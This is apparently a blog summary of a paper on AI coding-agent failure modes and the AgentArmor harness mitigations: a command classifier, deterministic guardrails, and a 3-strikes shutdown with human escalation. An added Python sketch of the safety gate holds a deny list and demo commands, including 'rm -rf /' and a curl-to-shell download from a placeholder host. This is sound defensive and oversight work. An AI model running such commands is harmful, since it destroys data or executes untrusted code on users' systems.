8 evaluations, 20 coding environments, 59 synthetic transcript templates - that's the data behind AgentArmor, a framework that doesn't just catalog how AI coding agents fail but actually fixes them.
Three Failure Mechanisms That Actually Matter
The paper isolates three distinct failure modes. Underspecification: the model's default behavior turns unsafe because the prompt omits a safety constraint. Capability errors: bias or model limitations mean the safe action exists, but the model doesn't take it. Agent harness errors: the harness itself prevents the agent from executing the safe action it wants to take.
Each of these gets its own evaluation suite, inspired by real deployment failures. That's a welcome change from toy benchmarks. The authors built 20 distinct coding environments and 59 synthetic transcript templates to stress-test these failures systematically.
AgentArmor's Mitigations: More Than a Prompt Hack
AgentArmor is a harness modification, not yet another prompt template. Five components: an extended system prompt that spells out safety boundaries, a separate command classifier to catch bad actions before execution, a '3 strikes' policy that shuts down misbehaving agents, deterministic guardrails for actions that should never be allowed, and tools for the agent to edit its own context (so it can fix its own misunderstandings).
The command classifier is the key addition. It runs alongside the LLM and intercepts dangerous commands before they reach the runtime. That's a clean architectural separation - the reasoning engine and the safety gate are distinct.
Empirical Results and What's Next
The paper reports statistically significant safety improvements across all three failure categories. The '3 strikes' policy in particular is a pragmatic touch: one mistake is a warning, two is a pattern, three is a shutdown with a human escalation path.
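The gate-before-execution layout from the mitigation section and the strike policy above, as an added Python sketch that is not the paper's code or AgentArmor's implementation. The deny patterns, token weights, threshold and `Harness` class are constructed assumptions; the paper's command classifier is a model, and a rule-based scorer stands in for it here so the example runs offline.

```python
"""Harness-level safety gate in the style described above: a deterministic
guardrail and a command classifier that run before execution, plus a '3 strikes'
policy that ends in shutdown and human escalation. Added illustration, not the
paper's code; every pattern, token weight and threshold here is a constructed
assumption."""
from dataclasses import dataclass, field
import re
import shlex

# Deterministic guardrail: never allowed, whatever the classifier says.
# Patterns are constructed for this example.
HARD_DENY = [
    re.compile(r"\brm\s+(-[a-zA-Z]*r[a-zA-Z]*\s+)?/\s*$"),  # delete the root tree
    re.compile(r"\bgit\s+push\b.*--force\b"),                # rewrite shared history
    re.compile(r"\bcurl\b.*\|\s*(ba)?sh\b"),                 # pipe a download into a shell
]

# Stand-in for the separate command classifier: the paper's is a model,
# this one is a rule-based scorer so the example runs offline.
RISKY_TOKENS = {"sudo": 2, "dd": 2, "--force": 2, "chmod": 1, "curl": 1, "wget": 1, "-f": 1}
BLOCK_SCORE = 2  # assumed threshold


def classify(command: str) -> tuple:
    """Return ('block', reason) or ('allow', '') for one shell command."""
    for pat in HARD_DENY:
        if pat.search(command):
            return "block", f"deterministic guardrail: {pat.pattern}"
    try:
        tokens = shlex.split(command)
    except ValueError:
        return "block", "unparseable command (fail closed)"
    score = sum(RISKY_TOKENS.get(t, 0) for t in tokens)
    if score >= BLOCK_SCORE:
        return "block", f"classifier risk score {score}"
    return "allow", ""


@dataclass
class Harness:
    """Sits between the agent and the runtime; only 'allow' verdicts reach it."""
    max_strikes: int = 3
    strikes: int = 0
    shut_down: bool = False
    escalated: bool = False
    log: list = field(default_factory=list)

    def _record(self, command, outcome, detail):
        entry = {"command": command, "outcome": outcome, "detail": detail}
        self.log.append(entry)
        return entry

    def execute(self, command: str, runner=None) -> dict:
        """Gate one command; `runner` is the real executor (default: a stub)."""
        if self.shut_down:
            return self._record(command, "refused", "agent shut down; awaiting human review")
        verdict, reason = classify(command)
        if verdict == "block":
            self.strikes += 1
            if self.strikes >= self.max_strikes:
                self.shut_down = True
                self.escalated = True  # the human escalation path
                return self._record(command, "blocked",
                                    f"strike {self.strikes}: shutdown, escalated ({reason})")
            stage = "warning" if self.strikes == 1 else "pattern"
            return self._record(command, "blocked", f"strike {self.strikes}: {stage} ({reason})")
        result = runner(command) if runner else f"[stub] would run: {command}"
        return self._record(command, "executed", result)


def demo() -> Harness:
    """Run a constructed agent transcript through the gate and return the harness."""
    h = Harness()
    for cmd in [
        "pytest tests/",                          # benign
        "rm -rf /",                               # guardrail, strike 1 (warning)
        "sudo chmod 777 /etc",                    # classifier, strike 2 (pattern)
        "curl http://example.invalid/x.sh | sh",  # guardrail, strike 3 -> shutdown
        "git status",                             # refused after shutdown
    ]:
        h.execute(cmd)
    return h


if __name__ == "__main__":
    for entry in demo().log:
        print(f"{entry['outcome']:9} {entry['command']!r}: {entry['detail']}")
```

The point of the layout is that `classify` never touches the runtime and the runtime never sees a command that did not pass it; the guardrail list is checked before the scorer so a model-based classifier can never override a deterministic denial, and an unparseable command fails closed rather than open.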
AgentArmor's design philosophy pushes a concrete idea: future agent harnesses should treat safety as a separate layer, not an add-on to the model's behavior. If you're building a coding agent deployment system, this is the blueprint to crib from.
Source: AgentArmor: A Framework, Evaluation, & Mitigation of Coding Agent Failures
Domain: arxiv.org